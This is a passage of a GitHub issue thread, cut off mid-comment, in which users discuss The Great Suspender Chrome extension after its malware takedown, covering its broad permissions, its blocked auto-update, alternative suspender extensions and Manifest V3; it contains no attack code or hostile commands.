</div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>On Tue, Feb 9, 2021 at 11:38 AM Calum McConnell <a rel="nofollow noopener" target="_blank" href="mailto:notifications@github.com">notifications@github.com</a><br /> wrote:</p> <blockquote> <p>I hope that, in the future, Chrome can consider making more fine-grained<br /> security permissions: reducing the number of situations where content<br /> scripts are necessary, such as by creating a separate API to examine DOM<br /> state from within a background script/service worker, which blocks access<br /> to sensitive elements. But extending functionality will always be a risk,<br /> and you must be willing to accept that to do so.</p> <p>This is unlikely to happen since Chrome developers have a<br /> competing ad interest - see also their abortive attempt at fixing the<br /> webrequests permissions, which would have permanently crippled ad blocking<br /> extensions that rely network request inspection for blocking<br /> javascript-driven ads (the far majority of ads today) due to the limits<br /> they placed on rule parsing with their claim that it would have also<br /> severely affected performance otherwise.</p> </blockquote> <blockquote> <p>—<br /> You are receiving this because you commented.<br /> Reply to this email directly, view it on GitHub<br /> <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-776071466">https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-776071466</a>,<br /> or unsubscribe<br /> <a rel="nofollow noopener" target="_blank" href="https://github.com/notifications/unsubscribe-auth/ABJAKBKLXTCYJIIBY7SEXPLS6FQIDANCNFSM4TI37TGQ">https://github.com/notifications/unsubscribe-auth/ABJAKBKLXTCYJIIBY7SEXPLS6FQIDANCNFSM4TI37TGQ</a><br /> .</p> </blockquote> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/5375237?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="cowbert picture"> <strong>cowbert</strong> <span class="text-muted ml-1">on 9 Feb 2021</span> </div> <div class="col text-right"> 😕<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Would be nice if Chromium just added a setting to kill processes after N minutes of non-use... :)</p> <p>Whenever I start Chromium (even with TGS), I kill all my renderer processes to get things going reasonably.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1095675?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="luke-jr picture"> <strong>luke-jr</strong> <span class="text-muted ml-1">on 9 Feb 2021</span> </div> <div class="col text-right"> 😄<span class="ml-2 mr-3">4</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>I finally ended up with the following:</p> <ul> <li>Using my own re-branded <a rel="nofollow noopener" target="_blank" href="https://github.com/barseghyanartur/tabsuspender">fork</a>, based on v7.1.6 (tag) with Google Analytics wiped out.</li> <li>Fix broken tabs using a <a rel="nofollow noopener" target="_blank" href="http://great-suspender-restore-urls.herokuapp.com/ui/index.html">tiny service</a>, source code is <a rel="nofollow noopener" target="_blank" href="https://github.com/barseghyanartur/the-great-suspender-restore-urls-service">here</a>.</li> </ul> <p>Migration from The Great Suspender could not have been any simpler.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/4925587?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="barseghyanartur picture"> <strong>barseghyanartur</strong> <span class="text-muted ml-1">on 10 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@barseghyanartur</strong> I hope there is an initiative for firefox version of this addon like this one (https://github.com/gioxx/MarvellousSuspender/issues/18)</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/29157187?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="dtantono picture"> <strong>dtantono</strong> <span class="text-muted ml-1">on 10 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">3</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p><strong>@barseghyanartur</strong> I hope there is an initiative for firefox version of this addon like this one (<a rel="nofollow noopener" target="_blank" href="https://github.com/gioxx/MarvellousSuspender/issues/18">gioxx#18</a>)</p> </blockquote> <p>Firefox already has the (infinitely safer, no permissions except tab access) <a rel="nofollow noopener" target="_blank" href="https://github.com/k5md/Total-Suspender-webextension">https://github.com/k5md/Total-Suspender-webextension</a></p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/228211?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="kliment picture"> <strong>kliment</strong> <span class="text-muted ml-1">on 10 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">3</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p><strong>@barseghyanartur</strong> I hope there is an initiative for firefox version of this addon like this one (<a rel="nofollow noopener" target="_blank" href="https://github.com/gioxx/MarvellousSuspender/issues/18">gioxx#18</a>)</p> </blockquote> <p>Oh wow, I didn't know about the <a rel="nofollow noopener" target="_blank" href="https://github.com/gioxx/MarvellousSuspender">gioxx/MarvellousSuspender</a>. Thanks!</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/4925587?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="barseghyanartur picture"> <strong>barseghyanartur</strong> <span class="text-muted ml-1">on 10 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>@minig0d</p> <blockquote> <p>Change your workflow so you don't keep so many tabs open at one time. Yes I know people will balk at this, but it's really not a great habit for productivity reasons anyway...</p> </blockquote> <p>Please don't make assumptions about what works for other people to maximize their productivity. There are good reasons some of us have many tabs open, productivity being one of them.</p> <p>More generally, you should think twice before basically telling people that their workflow is wrong, and work to understand why it is how it is, first.</p> </blockquote> <p>I'm not saying it's definitively wrong, I'm saying it tends to be just a bad habit. I'm extremely ADD personally and am just as guilty as most people. However, if this is the reason, it's also something we can practice and overcome. If this was not an appropriate solution for you, I provided 4 other suggestions... I'm sure there are plenty of use cases and so clearly there is not a single root cause.</p> <p>These were provided in response to a request (as a COURTESY, rather than just telling people to SCROLL UP and review the 300 comments above for the solutions which had already been mentioned).</p> <p>Given the wide range of technical skill levels / acceptable risks / and specifics of the individuals' use case, I provided a series of 5 potential solutions.</p> <p>There is really no need to get feisty... I didn't create the memory leak nor did I create the "malicious" extension... I'm merely trying to assist users (especially the less technically-inclined ones) from subjecting themselves to serious potential security risks (again) without fully understanding the implications. Also trying to save the grief (again as in the (near?) future, this extension and forks will cease to stop working once Chrome makes Manifest V3 mandatory or someone updates the code...</p> <p>But thanks for the kind words... next time maybe I'll just suggest people RTFM?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/54046315?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="minig0d picture"> <strong>minig0d</strong> <span class="text-muted ml-1">on 11 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <h1>To anyone who wants a legitimate reason to have hundreds of tabs open at once:</h1> <p>My work involves using an issue tracker (Jira). For each ticket assigned to me which is not yet out in production, I open a new window and pin that issue as a tab. In each window, I have tabs open relating to all the research I did while working on that ticket. This results in <strong>dozens of windows, each with dozens of tabs.</strong></p> <p>This isn't an ADD thing; this isn't a bad habit thing; this is an intentional choice I made which boosts my productivity greatly, and keeps me on-track over so many more things than my peers, helping me task-switch much more easily without losing any context.</p> <p>I need a suspend extension to enable this, so that the browser doesn't take up so many resources as to make my workstation unusable for anything else.</p> <hr /> <p>Before you tell me to use OneTab for this: I do, to archive windows for old tickets in case I need their context in another ticket. Open windows are for active tickets, since I do switch between them throughout the workday.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/10189808?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="BenLeggiero picture"> <strong>BenLeggiero</strong> <span class="text-muted ml-1">on 11 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">8</span> ❤<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p><strong>@minig0d</strong> There are many different tab-suspending alternatives. Auto Tab Discard is an example, though it lacks the gleaming polish of TGS. </p> </blockquote> <p>There very well may be... I just am not familiar with any to recommend such. And due to the previously discussed security concerns, and even Google's own recommendations, you should always run the minimum extensions necessary for exactly this reason. Hence the suggestion that people TRY not utilizing one again. When I first started using TGS, Chrome was eating up 3x the memory it does now, so depending on use-case it may not be necessary for some people (which makes it even more ideal).</p> <blockquote> <p>However, relying on Chrome's built-in memory saving is not an effective solution. Chrome will not discard tabs unless memory is running very low: that means a higher memory pressure, which leads to more swapping. </p> </blockquote> <p>Have you looked into the latest changes? It does not completely discard the tab, However it slows the heck out of almost all background tasks and (completely?) halts requestAnimationFrame on background tabs, which won't necessarily help memory, but could depending on why the page is using so much...</p> <p>But additionally the #tab-groups-collapse-freezing may not be completely automatic but it will probably fit into a lot of people's workflows... There's not really great documentation on it yet but:<br /> Official: <a rel="nofollow noopener" target="_blank" href="https://bugs.chromium.org/p/chromium/issues/detail?id=1110108">https://bugs.chromium.org/p/chromium/issues/detail?id=1110108</a><br /> A blog post that has shows tab groups: <a rel="nofollow noopener" target="_blank" href="https://chromeunboxed.com/ive-fallen-in-love-with-chrome-tab-groups">https://chromeunboxed.com/ive-fallen-in-love-with-chrome-tab-groups</a><br /> (Additionally it sounds like these are available in Brave and Edge too.)</p> <blockquote> <p>Manifest V3 changes many things, but the core functionality of TGS will remain possible (adblockers will be crippled, but that's not the point). A rewrite may be required, but the Marvelous Suspender fork has already made some pretty significant changes, and I don't see the service worker requirement as crippling.</p> </blockquote> <p>Not sure what you're referring to completely. If the Marvelous Suspender has been rewritten to not require the extensive permissions requested, that's great and could be a viable solution for some people. I have not looked through TGS's code to see what exactly it's using these elevated permissions for, but at least two of the API's included are removed so it would take at least some amount of rewriting, for sure. It may be minor cosmetic stuff and an easy fix, don't know haven't looked into it.</p> <blockquote> <p>At the end of the day, the current state of computer security is abysmal. It doesn't really matter what extensions you use if an attacker abuses a 0day in Chrome to get sandbox escape from a seemingly innocent site. Any and every piece of software on your computer can become malicious at any time, and a large portion of them auto-update, or update without notice. The only way to be truly secure is to leave your computer off: </p> </blockquote> <p>I agree in general. However, keep in mind, there are MANY different use cases. And some of us are in regulated industries where a data breach is much more significant than someone looking at some n00ds. And often, the most guilty people seem to be management who seem to be given local admin or power user access and aren't clamped down nearly as much. You're definitely right, nothing is for certain, but I certainly wouldn't want to guide a user into another precarious solution, would you?</p> <blockquote> <p>as extensions are a usually a relatively safe way of adding functionality, it is totally fair to expect people to install them. Every single person who installed TGS got a big notice about how broad it's security permissions were, and went ahead with it anyways.</p> </blockquote> <p>True, but the vast majority of people don't read the 100 pages of fine print when you sign up for a social media account either. People inherently trust there is at least some level of safety. This is also why lawmakers (at least in the US) are now actively wanting the fine print to be even more simplified. Up until 6 months ago, I really didn't understand the full implications of the permissions either and have been at this for a VERY long time...</p> <blockquote> <p>I hope that, in the future, Chrome can consider making more fine-grained security permissions: reducing the number of situations where content scripts are necessary, such as by creating a separate API to examine DOM state from within a background script/service worker, which blocks access to sensitive elements. But extending functionality will always be a risk, and you must be willing to accept that if you don't want to stick to a text-mode browsing experience.</p> </blockquote> <p>Well yeah that would certainly be nice from a security standpoint. My concern is more-so why does TGS have so many of these sensitive API's open, and the "highly rated" competitor ext I looked at did not? and it didn't require access to any of the more sensitive API's. I'm sure these weren't opened up unnecessarily, however, I do wonder if the need for some of the API's were really needed or they just supported a more "cosmetic" function. </p> <p>In retrospect it also seems like part of the problem is that all the permissions are presented to the user as if they are equal risk rather than weighing/color coding them by risk (ex. API's like fontSettings being low risk, bookmarks being medium risk, and webRequest or file: being highest risk). The other part is that it requires the user actually know what the things are (ex. for contextMenu if they showed a picture of one and said, this will allow items to be added to the context menu, or more harsh sounding wording to better demonstrate the potential risk, ex. "This extension will be able to see the complete contents (text, images, and other media) of every website you visit, will be able to inspect all your keystrokes, including passwords, will be able to see authentication tokens, and can potentially transmit them an identity thief in a foreign nation..." I'm guessing some people would think twice :)</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/54046315?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="minig0d picture"> <strong>minig0d</strong> <span class="text-muted ml-1">on 11 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>But thanks for the kind words... next time maybe I'll just suggest people RTFM?</p> </blockquote> <p><strong>@minig0d</strong> I asked the original question and I do appreciate the response, aiming for a healthier tab habit is a valid (and clearly the <em>safest</em> overall) solution. </p> <p>FWIW - I <em>had</em> reviewed the entire thread and was still unclear what was safe / active / recommended by those who know more than the n00bs among us (ie me!). So a summary from someone more knowledgeable was helpful (for example, I was all-in on Marvellous Suspender since I had no idea it would soon stop working) and again, appreciated. </p> <p>Thank you (and all others helping out here). </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/77774546?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="jimmhay picture"> <strong>jimmhay</strong> <span class="text-muted ml-1">on 11 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>To anyone who wants a legitimate reason to have hundreds of tabs open at once:</p> <p>My work involves using an issue tracker (Jira). For each ticket assigned to me which is not yet out in production, I open a new window and pin that issue as a tab. In each window, I have tabs open relating to all the research I did while working on that ticket. This results in <strong>dozens of windows, each with dozens of tabs.</strong></p> <p>This isn't an ADD thing; this isn't a bad habit thing; this is an intentional choice I made which boosts my productivity greatly, and keeps me on-track over so many more things than my peers, helping me task-switch much more easily without losing any context.</p> <p>I need a suspend extension to enable this, so that the browser doesn't take up so many resources as to make my workstation unusable for anything else.</p> <p>Before you tell me to use OneTab for this: I do, to archive windows for old tickets in case I need their context in another ticket. Open windows are for active tickets, since I do switch between them throughout the workday.</p> </blockquote> <p>Can't judge as I've never used Jira... I'm guessing there is probably a way to extract and save the pertinent info and index/consolidate it for even quicker reference (if you ever got ambitious into further streamlining).. But from what it sounds like you're doing it sounds like the tab group collapse/freezing route would be a natural fit for your current workflow. Would check that route out if you haven't already. </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/54046315?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="minig0d picture"> <strong>minig0d</strong> <span class="text-muted ml-1">on 11 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <blockquote> <p>But thanks for the kind words... next time maybe I'll just suggest people RTFM?</p> </blockquote> <p><strong>@minig0d</strong> I asked the original question and I do appreciate the response, aiming for a healthier tab habit is a valid (and clearly the _safest_ overall) solution.</p> <p>FWIW - I _had_ reviewed the entire thread and was still unclear what was safe / active / recommended by those who know more than the n00bs among us (ie me!). So a summary from someone more knowledgeable was helpful (for example, I was all-in on Marvellous Suspender since I had no idea it would soon stop working) and again, appreciated.</p> <p>Thank you (and all others helping out here).</p> </blockquote> <p>Sorry, process improvement is my career so I may be a bit too passionate about it lol.</p> <p>Marvelous suspender may continue working if the author updates it. I don't know the author and have no idea if they are intending to continue on with the development or if it was just a quick fork of this one to help people get back online quickly. If the intent is to further develop it (and therefore update it for the upcoming chrome changes), it very well may make a great alternative. Just hate for people to "go with" one solution, only to have to change again in the near future.</p> <p>FWIW, (and anyone wondering) I believe I read somewhere (but could be wrong) that Manifest V3 was originally going to be mandatory as of last month, but then it got pushed back to an unspecified date. And who knows, something like this may prompt a sooner than later deadline... or not... :)</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/54046315?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="minig0d picture"> <strong>minig0d</strong> <span class="text-muted ml-1">on 11 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Well, as far as I can tell, we have _no_ proof that ownership of this extension was actually transferred, if we have no proof that a new party exists. It seems very likely that <strong>@deanoemcke</strong> was approached to add things to the extension, at the very least.<br /> I have seen it speculated that the maintainer's github account could be compromised (i.e. sold to third party), but as this appears to be his professional account tied to his name I find that doubtful, especially given the lack of use of this repository for anything other than damage control. Which, by the way, isn't being done well at all, given that the users here are experienced enough to not buy the corporate-esque question dodging.</p> <p>Without any evidence otherwise, it stands to reason that legal action starts at @deanoemcke</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/826049?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="PikminRed picture"> <strong>PikminRed</strong> <span class="text-muted ml-1">on 11 Feb 2021</span> </div> <div class="col text-right"> 👎<span class="ml-2 mr-3">3</span> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@PikminRed</strong> Not correct. <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment">https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment</a>-721825463</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/251370?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Spaceghost picture"> <strong>Spaceghost</strong> <span class="text-muted ml-1">on 12 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@minig0d</strong> Can you not derail this thread about the security with y'alls workflow nitpicking please? 😄 </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/251370?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Spaceghost picture"> <strong>Spaceghost</strong> <span class="text-muted ml-1">on 12 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p><strong>@PikminRed</strong> Not correct. <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-721825463">#1263 (comment)</a></p> </blockquote> <p>What isn't, exactly? The linked comment is barely relevant.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/826049?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="PikminRed picture"> <strong>PikminRed</strong> <span class="text-muted ml-1">on 12 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>I've got an off-topic question:<br /> Every time my computer turns on and I open Chrome, or Chrome restarts, after a few minutes, I get a popup that, once again, "The Great Suspender has been removed because it contains malware." Is there any way to stop these notifications from happening <em>every time</em> I open up Chrome, and does the extension actually exist on my computer despite removing it every time until I get the notification? I've gotten this notification probably ten times, and aside from being annoying, it's somewhat worrisome. Thanks in advance 😄 </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/30274440?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="justingolden21 picture"> <strong>justingolden21</strong> <span class="text-muted ml-1">on 13 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@justingolden21</strong> erm just remove the addon maybe? why keep it?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/6721083?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="makedir picture"> <strong>makedir</strong> <span class="text-muted ml-1">on 13 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@justingolden21</strong>:</p> <p>Install <a rel="nofollow noopener" target="_blank" href="https://chrome.google.com/webstore/detail/the-marvellous-suspender/noogafoofpebimajpfpamcfhoaifemoa?hl=en">The Marvellous Suspender</a>.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/4925587?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="barseghyanartur picture"> <strong>barseghyanartur</strong> <span class="text-muted ml-1">on 13 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">10</span> 🎉<span class="ml-2 mr-3">7</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>@justingolden21<br /> Is there any way to stop these notifications from happening _every time_ I open up Chrome</p> </blockquote> <p>Try checking <a rel="nofollow noopener" target="_blank" href="chrome://extensions/">chrome://extensions/</a> to see if it's still there but disabled. If it is, click "Remove".<br /> You might also want to check <a rel="nofollow noopener" target="_blank" href="chrome://extensions/?id=klbibkeccnjlkjkiokjodocebajanakg">chrome://extensions/?id=klbibkeccnjlkjkiokjodocebajanakg</a> specifically</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/10189808?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="BenLeggiero picture"> <strong>BenLeggiero</strong> <span class="text-muted ml-1">on 16 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>So, I just looked a bit more into the exact details of how and why many users didn't have the extension auto-update, and the results seem to support the conspiracy theory that there was no sale. I wasn't a big fan of that idea until now, because I am an<br /> optimist who prefers to see the better side of people.</p> <p>See, I had assumed that Chrome's developer system was fairly sophisticated, and allowed extension distributors to push out updates to the Web Store but not to all users, because of how I read the issue describing TGS's new update process. That isn't the case. However, there is no documented way to delay, decline, or impede updates, either for the user or the extension.</p> <p>To implement it's update notification system, TGS used a now-deprecated API that is intended for chrome apps (not extensions!). The API fires an event, which was picked up by the extension and held onto until the user confirms that they are ready to update. However, in June 2020 (ie, after the sale), a commit by Dean Omecke (in gsSession.js) removed that portion of the code, causing the user to be unnotified and the extension to refuse to let the update proceed. The event would be caught, the tab backup made, but (if there were any suspended tabs) the extension would just wait.</p> <p>A comment in his code states that the extension would update on the next browser restart. However, it looks like that isn't the case: in addition to many people reporting that the update never occurred, there is a several-year-old Chrome bug report that describes a failure to update. It looks as though the event is fired before the actual download of the update. Since this API is intended for chrome APPS (which are usually loaded after the browser when the user specifically requests to open them)<br /> as opposed to EXTENSIONS (which are loaded as soon as the browser starts), I'm not sure the update COULD ever occur. Extensions are initialized as soon as the browser starts, meaning that the registration of the auto-updating-preventing event handler is done before it auto-updates.</p> <p>So yeah. That seems to be why nobody got the 7.1.9 update, despite the chrome web store listing it as current.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/13556193?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="TheMageKing picture"> <strong>TheMageKing</strong> <span class="text-muted ml-1">on 16 Feb 2021</span> </div> <div class="col text-right"> 👀<span class="ml-2 mr-3">6</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>To implement it's update notification system, TGS used a now-deprecated API that is intended for chrome apps (not extensions!). The API fires an event, which was picked up by the extension and held onto until the user confirms that they are ready to update. However, in June 2020 (ie, after the sale), a commit by Dean Omecke (in gsSession.js) removed that portion of the code, causing the user to be unnotified and the extension to refuse to let the update proceed. The event would be caught, the tab backup made, but (if there were any suspended tabs) the extension would just wait.</p> </blockquote> <p>Just a side note - the current extension API docs are super broken, they marked every single page deprecated because they are deprecating "chrome apps" but not "chrome extensions" while at the same time moving from MV2 to MV3 - see the discussion on the crx mailing list asking why chrome.tabs is marked deprecated. I'm not sure if the specific API you are talking about is for-real deprecated or just badly documented, generally most of the event handlers should stick around though.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/418638?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="nfultz picture"> <strong>nfultz</strong> <span class="text-muted ml-1">on 16 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>It's listed as a "chrome app" API, along with the rest of the Chrome.runtime set, which also includes a whole bunch of API's for interacting with lower-level OS functions (like opening ports to native devices, restarting ChromeOS devices in Kiosk mode, ect)</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/13556193?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="TheMageKing picture"> <strong>TheMageKing</strong> <span class="text-muted ml-1">on 16 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Right, they put the below message on every single API page in the extension developer docs.</p> <blockquote> <p>This API is part of the deprecated Chrome Apps platform. Learn more about migrating your app.</p> </blockquote> <p><code>chrome.runtime</code> is probably sticking around, it's how you check errors on callbacks, for example, or pass messages between different pages.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/418638?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="nfultz picture"> <strong>nfultz</strong> <span class="text-muted ml-1">on 16 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <blockquote> <p>@justingolden21<br /> Is there any way to stop these notifications from happening _every time_ I open up Chrome</p> </blockquote> <p>Try checking <a rel="nofollow noopener" target="_blank" href="chrome://extensions/">chrome://extensions/</a> to see if it's still there but disabled. If it is, click "Remove".<br /> You might also want to check <a rel="nofollow noopener" target="_blank" href="chrome://extensions/?id=klbibkeccnjlkjkiokjodocebajanakg">chrome://extensions/?id=klbibkeccnjlkjkiokjodocebajanakg</a> specifically</p> </blockquote> <p>That worked, thanks! When it explicitly told me it was removed, then I went to the store page to confirm, I assumed it was actually removed, but apparently it was still there, just disabled. Chrome really needs to handle that better...</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/30274440?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="justingolden21 picture"> <strong>justingolden21</strong> <span class="text-muted ml-1">on 16 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <blockquote> <p><strong>@barseghyanartur</strong> I hope there is an initiative for firefox version of this addon like this one (<a rel="nofollow noopener" target="_blank" href="https://github.com/gioxx/MarvellousSuspender/issues/18">gioxx#18</a>)</p> </blockquote> <p>Oh wow, I didn't know about the <a rel="nofollow noopener" target="_blank" href="https://github.com/gioxx/MarvellousSuspender">gioxx/MarvellousSuspender</a>. Thanks!</p> </blockquote> <p>for firefox, you also have the <a rel="nofollow noopener" target="_blank" href="https://add0n.com/tab-discard.html">https://add0n.com/tab-discard.html</a> , that is a mozilla recommended add-on (ie: they did check the code and looks good)</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/11890049?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="danielmotaleite picture"> <strong>danielmotaleite</strong> <span class="text-muted ml-1">on 17 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Hey all - I dunno if this is related, or even relevant anymore, but it seems to be. For several months, one out of every hunred or so URLs which I would __type into the URL bar__ would randomly bring me to some ad-laden privacy nightmare style site - things you get by mistyping popular URLs, designed to prey on people. Thing is, since it happened, I started VERY VERY CAREFULLY examining my entries before comfirming them and visiting that site.</p> <p>I now believe that The Great Suspender <em>may</em> have been modifying my browsing attempts in some manner. I'll continue to monitor my browser's behavior, but have there been other reports of similar issues? (I tried searching the thread here but didn't notice any..)</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/42219549?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="codefaux picture"> <strong>codefaux</strong> <span class="text-muted ml-1">on 17 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>For several months, one out of every hunred or so URLs which I would <strong>type into the URL bar</strong> would randomly bring me to some ad-laden privacy nightmare style site - things you 